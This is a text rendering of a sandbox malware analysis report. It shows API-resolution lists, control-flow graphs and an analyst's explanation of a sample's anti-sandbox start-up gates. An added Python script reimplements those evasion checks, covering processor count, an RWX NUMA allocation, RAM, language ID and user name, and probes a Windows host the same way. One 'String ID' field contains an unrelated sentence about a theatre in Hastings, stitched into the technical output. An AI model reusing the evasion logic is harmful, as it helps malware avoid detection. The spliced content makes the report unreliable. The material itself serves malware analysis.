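Run it over the full API lists copied from the report; a base such as 74DD0000 here, against which every name is opaque, still has to be named from the disassembly or the report's loaded-module list, while 76E90000 and 75BD0000 are identified by their single plaintext exports.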

                           Control-flow Graph (basic blocks with their API calls and successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable in text)
                           • 2141 7f1bf0-7f1c0b call 7d2a90, call 7f6390 -> 2146, 2147
                           • 2146 7f1c0d -> 2148
                           • 2147 7f1c1a-7f1c27 call 7d2930 -> 2151, 2152
                           • 2148 7f1c10-7f1c18 -> 2147, 2148
                           • 2151 7f1c29-7f1c2f lstrcpy -> 2152
                           • 2152 7f1c35-7f1c63 -> 2156, 2157
                           • 2156 7f1c6d-7f1c7b GetSystemInfo -> 2158, 2159
                           • 2157 7f1c65-7f1c67 ExitProcess
                           • 2158 7f1c7d-7f1c7f ExitProcess
                           • 2159 7f1c85-7f1ca0 call 7d1030, call 7d10c0, GetUserDefaultLangID -> 2164, 2165
                           • 2164 7f1cb8-7f1cca call 7f2ad0, call 7f3e10 -> 2171, 2172
                           • 2165 7f1ca2-7f1ca9 -> 2164, 2166
                           • 2166 7f1cb0-7f1cb2 ExitProcess
                           • 2171 7f1ccc-7f1cde call 7f2a40, call 7f3e10 -> 2172, 2185
                           • 2172 7f1ce7-7f1d06 lstrlen, call 7d2930 -> 2178, 2179
                           • 2178 7f1d08-7f1d0d -> 2179, 2180
                           • 2179 7f1d23-7f1d40 lstrlen, call 7d2930 -> 2186, 2187
                           • 2180 7f1d0f-7f1d11 -> 2179, 2183
                           • 2183 7f1d13-7f1d1d lstrcpy, lstrcat -> 2179
                           • 2185 7f1ce0-7f1ce1 ExitProcess
                           • 2186 7f1d5a-7f1d7b call 7f2ad0, lstrlen, call 7d2930 -> 2193, 2194
                           • 2187 7f1d42-7f1d44 -> 2186, 2188
                           • 2188 7f1d46-7f1d54 lstrcpy, lstrcat -> 2186
                           • 2193 7f1d7d-7f1d7f -> 2194, 2196
                           • 2194 7f1d9a-7f1db4 lstrlen, call 7d2930 -> 2199, 2200
                           • 2196 7f1d81-7f1d85 -> 2194, 2198
                           • 2198 7f1d87-7f1d94 lstrcpy, lstrcat -> 2194
                           • 2199 7f1dce-7f1deb call 7f2a40, lstrlen, call 7d2930 -> 2206, 2207
                           • 2200 7f1db6-7f1db8 -> 2199, 2201
                           • 2201 7f1dba-7f1dc8 lstrcpy, lstrcat -> 2199
                           • 2206 7f1ded-7f1def -> 2207, 2208
                           • 2207 7f1e0a-7f1e0f -> 2209, 2210
                           • 2208 7f1df1-7f1df5 -> 2207, 2212
                           • 2209 7f1e16-7f1e22 call 7d2930 -> 2215, 2216
                           • 2210 7f1e11 call 7d2a20 -> 2209
                           • 2212 7f1df7-7f1e04 lstrcpy, lstrcat -> 2207
                           • 2215 7f1e24-7f1e26 -> 2216, 2217
                           • 2216 7f1e30-7f1e66 call 7d2a20 * 5, OpenEventA -> 2228, 2229
                           • 2217 7f1e28-7f1e2a lstrcpy -> 2216
                           • 2228 7f1e8c-7f1ea0 CreateEventA, call 7f1b20, call 7effd0 -> 2233
                           • 2229 7f1e68-7f1e8a CloseHandle, Sleep, OpenEventA -> 2228, 2229
                           • 2233 7f1ea5-7f1eae CloseHandle, ExitProcess
                          APIs
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252218), ref: 007F63E9
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252320), ref: 007F6402
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252380), ref: 007F641A
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252338), ref: 007F6432
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01258F08), ref: 007F644B
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01245970), ref: 007F6463
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01245710), ref: 007F647B
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252488), ref: 007F6494
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01252398), ref: 007F64AC
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,012523F8), ref: 007F64C4
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,012523B0), ref: 007F64DD
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,01245990), ref: 007F64F5
                            • Part of subcall function 007F6390: GetProcAddress.KERNEL32(74DD0000,012523C8), ref: 007F650D
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F1C2F
                          • ExitProcess.KERNEL32 ref: 007F1C67
                          • GetSystemInfo.KERNEL32(?), ref: 007F1C71
                          • ExitProcess.KERNEL32 ref: 007F1C7F
                            • Part of subcall function 007D1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
                            • Part of subcall function 007D1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
                            • Part of subcall function 007D1030: ExitProcess.KERNEL32 ref: 007D1058
                            • Part of subcall function 007D10C0: GlobalMemoryStatusEx.KERNEL32 ref: 007D10EA
                            • Part of subcall function 007D10C0: ExitProcess.KERNEL32 ref: 007D1114
                          • GetUserDefaultLangID.KERNEL32 ref: 007F1C8F
                          • ExitProcess.KERNEL32 ref: 007F1CB2
                          • ExitProcess.KERNEL32 ref: 007F1CE1
                          • lstrlen.KERNEL32(01259038), ref: 007F1CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1D15
                          • lstrcat.KERNEL32(00000000,01259038), ref: 007F1D1D
                          • lstrlen.KERNEL32(00804B98), ref: 007F1D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1D48
                          • lstrcat.KERNEL32(00000000,00804B98), ref: 007F1D54
                          • lstrlen.KERNEL32(00000000), ref: 007F1D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1D94
                          • lstrlen.KERNEL32(00804B98), ref: 007F1D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1DBC
                          • lstrcat.KERNEL32(00000000,00804B98), ref: 007F1DC8
                          • lstrlen.KERNEL32(00000000), ref: 007F1DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: 938ee12b901ef1d50c093527dc77add5ac3b2119f8672fdaf24bc8344e2c9478
                          • Instruction ID: 25448cadf32dc462d04197a52ce6da25bf6ee822dfad1186c8d4ac7386e47907
                          • Opcode Fuzzy Hash: 938ee12b901ef1d50c093527dc77add5ac3b2119f8672fdaf24bc8344e2c9478
                          • Instruction Fuzzy Hash: C1713D3164121EEBD721EBF09C4DB7F7AB9AF55701F444015FA46A62A2DB7C9803CB60
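
Function 007F1BF0 is the sample's start-up gate, and its control-flow graph reads in order: the API resolver 007F6390; GetSystemInfo with a direct edge to ExitProcess at 007F1C7F; subroutine 007D1030, which calls VirtualAllocExNuma with the arguments on the stack at 007D1046 (size 0x7D0, MEM_COMMIT|MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40, NUMA node 0) and exits at 007D1058 if the call fails, which is what an emulator without that API produces; subroutine 007D10C0, which calls GlobalMemoryStatusEx and exits at 007D1114; GetUserDefaultLangID with an exit branch at 007F1CB2; then two calls into 007F3E10 fed by 007F2AD0 (its API list is not on this page) and by 007F2A40, the GetUserNameA routine listed further down, with an exit branch at 007F1CE1. Only a host that passes every gate reaches the lstrcpy/lstrcat string building and the OpenEventA loop, which reads as waiting for an earlier instance's event to go away (CloseHandle, Sleep, OpenEventA again) before CreateEventA and the main routines 007F1B20 and 007EFFD0. The Python below is an added example, not part of the report or of the sample: it models the gate order over a HostProfile so an analyst can see which gate a given sandbox configuration trips, and on Windows only it collects the same values through the same Win32 calls via ctypes. The thresholds, the blocked LANGID set and the blocked user names are placeholders, because the report shows the API chain but not the constants compared, and the GetSystemInfo field being tested is assumed to be the processor count.

```python
import sys
from dataclasses import dataclass


@dataclass
class HostProfile:
    processors: int          # SYSTEM_INFO.dwNumberOfProcessors
    numa_alloc_ok: bool      # VirtualAllocExNuma returned non-NULL
    total_ram_bytes: int     # MEMORYSTATUSEX.ullTotalPhys
    lang_id: int             # GetUserDefaultLangID()
    user_name: str           # GetUserNameA()


# ASSUMED placeholder constants: the report shows the API chain, not the values
# compared. Replace them with the constants recovered from the disassembly.
MIN_PROCESSORS = 2
MIN_RAM_BYTES = 2 * 1024 ** 3
BLOCKED_PRIMARY_LANGS = {0x19}        # 0x19 = LANG_RUSSIAN, placeholder entry
BLOCKED_USER_NAMES = {"sandbox"}      # placeholder entry


def primary_language(lang_id: int) -> int:
    """LANGID = (sublanguage << 10) | primary language, as MAKELANGID builds it."""
    return lang_id & 0x3FF


def evasion_gates(p: HostProfile) -> list:
    """Gates that would route this host to ExitProcess, in the order the CFG
    of 007F1BF0 evaluates them. An empty list means the sample would run on."""
    fired = []
    if p.processors < MIN_PROCESSORS:           # GetSystemInfo -> ExitProcess (007F1C7F)
        fired.append("GetSystemInfo")
    if not p.numa_alloc_ok:                     # 007D1030: VirtualAllocExNuma -> ExitProcess
        fired.append("VirtualAllocExNuma")
    if p.total_ram_bytes < MIN_RAM_BYTES:       # 007D10C0: GlobalMemoryStatusEx -> ExitProcess
        fired.append("GlobalMemoryStatusEx")
    if primary_language(p.lang_id) in BLOCKED_PRIMARY_LANGS:   # -> ExitProcess (007F1CB2)
        fired.append("GetUserDefaultLangID")
    if p.user_name.lower() in BLOCKED_USER_NAMES:  # 007F2A40 via 007F3E10 -> ExitProcess (007F1CE1)
        fired.append("GetUserNameA")
    return fired


def probe_windows_host():
    """Collect the same values the sample reads, through the same Win32 APIs.
    Returns None on anything but Windows so the module stays importable."""
    if sys.platform != "win32":
        return None
    import ctypes
    import ctypes.wintypes as wt

    class SYSTEM_INFO(ctypes.Structure):
        _fields_ = [("wProcessorArchitecture", wt.WORD), ("wReserved", wt.WORD),
                    ("dwPageSize", wt.DWORD),
                    ("lpMinimumApplicationAddress", ctypes.c_void_p),
                    ("lpMaximumApplicationAddress", ctypes.c_void_p),
                    ("dwActiveProcessorMask", ctypes.c_void_p),
                    ("dwNumberOfProcessors", wt.DWORD), ("dwProcessorType", wt.DWORD),
                    ("dwAllocationGranularity", wt.DWORD),
                    ("wProcessorLevel", wt.WORD), ("wProcessorRevision", wt.WORD)]

    class MEMORYSTATUSEX(ctypes.Structure):
        _fields_ = [("dwLength", wt.DWORD), ("dwMemoryLoad", wt.DWORD)] + [
            (n, ctypes.c_ulonglong) for n in (
                "ullTotalPhys", "ullAvailPhys", "ullTotalPageFile", "ullAvailPageFile",
                "ullTotalVirtual", "ullAvailVirtual", "ullAvailExtendedVirtual")]

    k32 = ctypes.windll.kernel32
    adv = ctypes.windll.advapi32
    si = SYSTEM_INFO()
    k32.GetSystemInfo(ctypes.byref(si))
    ms = MEMORYSTATUSEX()
    ms.dwLength = ctypes.sizeof(ms)
    k32.GlobalMemoryStatusEx(ctypes.byref(ms))
    # Same arguments as the sample's call at 007D104D: 0x7D0 bytes,
    # MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40), NUMA node 0.
    k32.GetCurrentProcess.restype = wt.HANDLE
    k32.VirtualAllocExNuma.restype = ctypes.c_void_p
    k32.VirtualAllocExNuma.argtypes = [wt.HANDLE, ctypes.c_void_p, ctypes.c_size_t,
                                       wt.DWORD, wt.DWORD, wt.DWORD]
    numa = k32.VirtualAllocExNuma(k32.GetCurrentProcess(), None, 0x7D0, 0x3000, 0x40, 0)
    name = ctypes.create_string_buffer(0x104)        # same 0x104 buffer size as at 007F2A8A
    size = wt.DWORD(0x104)
    adv.GetUserNameA(name, ctypes.byref(size))
    return HostProfile(si.dwNumberOfProcessors, numa is not None, ms.ullTotalPhys,
                       k32.GetUserDefaultLangID(), name.value.decode(errors="replace"))


if __name__ == "__main__":
    # Off Windows, fall back to a constructed profile that trips every gate.
    profile = probe_windows_host() or HostProfile(1, False, 1024 ** 3, 0x0419, "sandbox")
    print(profile)
    print("gates fired:", evasion_gates(profile) or "none, the sample would run on")
```

Because the primary language sits in the low ten bits, a sublanguage variant such as 0x0819 trips the same LANGID gate as 0x0419; a sandbox that only changes the display language without changing the user default locale does not change what GetUserDefaultLangID returns.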

                           Control-flow Graph (basic blocks with their API calls and successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable in text)
                           • 2850 7d4a60-7d4afc RtlAllocateHeap -> 2867, 2868
                           • 2867 7d4afe-7d4b03 -> 2869
                           • 2868 7d4b7a-7d4bbe VirtualProtect (no successors)
                           • 2869 7d4b06-7d4b78 -> 2868
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D4AA2
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 007D4BB0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: fe76ea2f440519ff618fdb1d9fe9a2a28bffeb3a5c3ae00448bb7aa834eacfb8
                          • Instruction ID: d79f51ca86ac46a357b4c75143804db7aea6c786ea814e6276d2b3c01b1305f5
                          • Opcode Fuzzy Hash: fe76ea2f440519ff618fdb1d9fe9a2a28bffeb3a5c3ae00448bb7aa834eacfb8
                          • Instruction Fuzzy Hash: 6831E795BC021C76D660FBEF4C47F5F6E55FF86760B0160667628D33D0C9A95420CAA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007F2A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 007F2A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 8af0c90478f8549c5d5fa6046a7491128e4cbd1ee0c93442f7330cc7d515eee3
                          • Instruction ID: 3ca05b75bf239e873a0025d9fd1e74ab1d872cd3f55aa9d5b36826df3e77af19
                          • Opcode Fuzzy Hash: 8af0c90478f8549c5d5fa6046a7491128e4cbd1ee0c93442f7330cc7d515eee3
                          • Instruction Fuzzy Hash: 79F0B4B1A40608ABC700DF98DD49B9FBBBCFB04B21F000216FA15E3780D7B8190586A1

                           Control-flow Graph (basic blocks with their API calls and successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable in text)
                           • 633 7f66e0-7f66e7 -> 634, 635
                           • 634 7f6afe-7f6b92 LoadLibraryA * 8 -> 636, 637
                           • 635 7f66ed-7f6af9 GetProcAddress * 43 -> 634
                           • 636 7f6c08-7f6c0f -> 638, 639
                           • 637 7f6b94-7f6c03 GetProcAddress * 5 -> 636
                           • 638 7f6c15-7f6ccd GetProcAddress * 8 -> 639
                           • 639 7f6cd2-7f6cd9 -> 640, 641
                           • 640 7f6d4f-7f6d56 -> 642, 643
                           • 641 7f6cdb-7f6d4a GetProcAddress * 5 -> 640
                           • 642 7f6d5c-7f6de4 GetProcAddress * 6 -> 643
                           • 643 7f6de9-7f6df0 -> 644, 645
                           • 644 7f6df6-7f6f0b GetProcAddress * 12 -> 645
                           • 645 7f6f10-7f6f17 -> 646, 647
                           • 646 7f6f8d-7f6f94 -> 648, 649
                           • 647 7f6f19-7f6f88 GetProcAddress * 5 -> 646
                           • 648 7f6f96-7f6fbc GetProcAddress * 2 -> 649
                           • 649 7f6fc1-7f6fc8 -> 650, 651
                           • 650 7f6fca-7f6ff0 GetProcAddress * 2 -> 651
                           • 651 7f6ff5-7f6ffc -> 652, 653
                           • 652 7f70ed-7f70f4 -> 654, 655
                           • 653 7f7002-7f70e8 GetProcAddress * 10 -> 652
                           • 654 7f70f6-7f714d GetProcAddress * 4 -> 655
                           • 655 7f7152-7f7159 -> 656, 657
                           • 656 7f716e-7f7175 -> 658, 659
                           • 657 7f715b-7f7169 GetProcAddress -> 656
                           • 658 7f7177-7f71ce GetProcAddress * 4 -> 659
                           • 659 7f71d3 (no successors)
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,012457F0), ref: 007F66F5
                          • GetProcAddress.KERNEL32(74DD0000,012456D0), ref: 007F670D
                          • GetProcAddress.KERNEL32(74DD0000,012596D0), ref: 007F6726
                          • GetProcAddress.KERNEL32(74DD0000,01259670), ref: 007F673E
                          • GetProcAddress.KERNEL32(74DD0000,01259688), ref: 007F6756
                          • GetProcAddress.KERNEL32(74DD0000,012596A0), ref: 007F676F
                          • GetProcAddress.KERNEL32(74DD0000,0124B680), ref: 007F6787
                          • GetProcAddress.KERNEL32(74DD0000,0125D100), ref: 007F679F
                          • GetProcAddress.KERNEL32(74DD0000,0125CFF8), ref: 007F67B8
                          • GetProcAddress.KERNEL32(74DD0000,0125D028), ref: 007F67D0
                          • GetProcAddress.KERNEL32(74DD0000,0125CFC8), ref: 007F67E8
                          • GetProcAddress.KERNEL32(74DD0000,01245930), ref: 007F6801
                          • GetProcAddress.KERNEL32(74DD0000,01245810), ref: 007F6819
                          • GetProcAddress.KERNEL32(74DD0000,01245950), ref: 007F6831
                          • GetProcAddress.KERNEL32(74DD0000,01245870), ref: 007F684A
                          • GetProcAddress.KERNEL32(74DD0000,0125CFE0), ref: 007F6862
                          • GetProcAddress.KERNEL32(74DD0000,0125D0B8), ref: 007F687A
                          • GetProcAddress.KERNEL32(74DD0000,0124B7E8), ref: 007F6893
                          • GetProcAddress.KERNEL32(74DD0000,01245A70), ref: 007F68AB
                          • GetProcAddress.KERNEL32(74DD0000,0125D058), ref: 007F68C3
                          • GetProcAddress.KERNEL32(74DD0000,0125CF20), ref: 007F68DC
                          • GetProcAddress.KERNEL32(74DD0000,0125D118), ref: 007F68F4
                          • GetProcAddress.KERNEL32(74DD0000,0125CF80), ref: 007F690C
                          • GetProcAddress.KERNEL32(74DD0000,01245830), ref: 007F6925
                          • GetProcAddress.KERNEL32(74DD0000,0125D0D0), ref: 007F693D
                          • GetProcAddress.KERNEL32(74DD0000,0125CF50), ref: 007F6955
                          • GetProcAddress.KERNEL32(74DD0000,0125CF68), ref: 007F696E
                          • GetProcAddress.KERNEL32(74DD0000,0125D148), ref: 007F6986
                          • GetProcAddress.KERNEL32(74DD0000,0125CF98), ref: 007F699E
                          • GetProcAddress.KERNEL32(74DD0000,0125D070), ref: 007F69B7
                          • GetProcAddress.KERNEL32(74DD0000,0125CFB0), ref: 007F69CF
                          • GetProcAddress.KERNEL32(74DD0000,0125D010), ref: 007F69E7
                          • GetProcAddress.KERNEL32(74DD0000,0125D1A8), ref: 007F6A00
                          • GetProcAddress.KERNEL32(74DD0000,0125A6B0), ref: 007F6A18
                          • GetProcAddress.KERNEL32(74DD0000,0125D1C0), ref: 007F6A30
                          • GetProcAddress.KERNEL32(74DD0000,0125D040), ref: 007F6A49
                          • GetProcAddress.KERNEL32(74DD0000,012458B0), ref: 007F6A61
                          • GetProcAddress.KERNEL32(74DD0000,0125D088), ref: 007F6A79
                          • GetProcAddress.KERNEL32(74DD0000,01245A30), ref: 007F6A92
                          • GetProcAddress.KERNEL32(74DD0000,0125D0A0), ref: 007F6AAA
                          • GetProcAddress.KERNEL32(74DD0000,0125D0E8), ref: 007F6AC2
                          • GetProcAddress.KERNEL32(74DD0000,01245A50), ref: 007F6ADB
                          • GetProcAddress.KERNEL32(74DD0000,01245B50), ref: 007F6AF3
                          • LoadLibraryA.KERNEL32(0125D130,007F051F), ref: 007F6B05
                          • LoadLibraryA.KERNEL32(0125D160), ref: 007F6B16
                          • LoadLibraryA.KERNEL32(0125D178), ref: 007F6B28
                          • LoadLibraryA.KERNEL32(0125D190), ref: 007F6B3A
                          • LoadLibraryA.KERNEL32(0125CF38), ref: 007F6B4B
                          • LoadLibraryA.KERNEL32(0125D1D8), ref: 007F6B5D
                          • LoadLibraryA.KERNEL32(0125D1F0), ref: 007F6B6F
                          • LoadLibraryA.KERNEL32(0125CF08), ref: 007F6B80
                          • GetProcAddress.KERNEL32(75290000,01245AF0), ref: 007F6B9C
                          • GetProcAddress.KERNEL32(75290000,0125D3A0), ref: 007F6BB4
                          • GetProcAddress.KERNEL32(75290000,01258FE8), ref: 007F6BCD
                          • GetProcAddress.KERNEL32(75290000,0125D430), ref: 007F6BE5
                          • GetProcAddress.KERNEL32(75290000,01245D10), ref: 007F6BFD
                          • GetProcAddress.KERNEL32(73B50000,0124B5E0), ref: 007F6C1D
                          • GetProcAddress.KERNEL32(73B50000,01245AD0), ref: 007F6C35
                          • GetProcAddress.KERNEL32(73B50000,0124B810), ref: 007F6C4E
                          • GetProcAddress.KERNEL32(73B50000,0125D478), ref: 007F6C66
                          • GetProcAddress.KERNEL32(73B50000,0125D4F0), ref: 007F6C7E
                          • GetProcAddress.KERNEL32(73B50000,01245C70), ref: 007F6C97
                          • GetProcAddress.KERNEL32(73B50000,01245BF0), ref: 007F6CAF
                          • GetProcAddress.KERNEL32(73B50000,0125D298), ref: 007F6CC7
                          • GetProcAddress.KERNEL32(752C0000,01245AB0), ref: 007F6CE3
                          • GetProcAddress.KERNEL32(752C0000,01245D30), ref: 007F6CFB
                          • GetProcAddress.KERNEL32(752C0000,0125D490), ref: 007F6D14
                          • GetProcAddress.KERNEL32(752C0000,0125D208), ref: 007F6D2C
                          • GetProcAddress.KERNEL32(752C0000,01245C30), ref: 007F6D44
                          • GetProcAddress.KERNEL32(74EC0000,0124B6A8), ref: 007F6D64
                          • GetProcAddress.KERNEL32(74EC0000,0124B900), ref: 007F6D7C
                          • GetProcAddress.KERNEL32(74EC0000,0125D250), ref: 007F6D95
                          • GetProcAddress.KERNEL32(74EC0000,01245C10), ref: 007F6DAD
                          • GetProcAddress.KERNEL32(74EC0000,01245D50), ref: 007F6DC5
                          • GetProcAddress.KERNEL32(74EC0000,0124B6F8), ref: 007F6DDE
                          • GetProcAddress.KERNEL32(75BD0000,0125D4A8), ref: 007F6DFE
                          • GetProcAddress.KERNEL32(75BD0000,01245BD0), ref: 007F6E16
                          • GetProcAddress.KERNEL32(75BD0000,01258FC8), ref: 007F6E2F
                          • GetProcAddress.KERNEL32(75BD0000,0125D3B8), ref: 007F6E47
                          • GetProcAddress.KERNEL32(75BD0000,0125D238), ref: 007F6E5F
                          • GetProcAddress.KERNEL32(75BD0000,01245C50), ref: 007F6E78
                          • GetProcAddress.KERNEL32(75BD0000,01245C90), ref: 007F6E90
                          • GetProcAddress.KERNEL32(75BD0000,0125D310), ref: 007F6EA8
                          • GetProcAddress.KERNEL32(75BD0000,0125D4C0), ref: 007F6EC1
                          • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 007F6ED7
                          • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 007F6EEE
                          • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 007F6F05
                          • GetProcAddress.KERNEL32(75A70000,01245DF0), ref: 007F6F21
                          • GetProcAddress.KERNEL32(75A70000,0125D4D8), ref: 007F6F39
                          • GetProcAddress.KERNEL32(75A70000,0125D460), ref: 007F6F52
                          • GetProcAddress.KERNEL32(75A70000,0125D220), ref: 007F6F6A
                          • GetProcAddress.KERNEL32(75A70000,0125D268), ref: 007F6F82
                          • GetProcAddress.KERNEL32(75450000,01245CB0), ref: 007F6F9E
                          • GetProcAddress.KERNEL32(75450000,01245D90), ref: 007F6FB6
                          • GetProcAddress.KERNEL32(75DA0000,01245B70), ref: 007F6FD2
                          • GetProcAddress.KERNEL32(75DA0000,0125D448), ref: 007F6FEA
                          • GetProcAddress.KERNEL32(6F070000,01245B90), ref: 007F700A
                          • GetProcAddress.KERNEL32(6F070000,01245CD0), ref: 007F7022
                          • GetProcAddress.KERNEL32(6F070000,01245BB0), ref: 007F703B
                          • GetProcAddress.KERNEL32(6F070000,0125D280), ref: 007F7053
                          • GetProcAddress.KERNEL32(6F070000,01245CF0), ref: 007F706B
                          • GetProcAddress.KERNEL32(6F070000,01245B10), ref: 007F7084
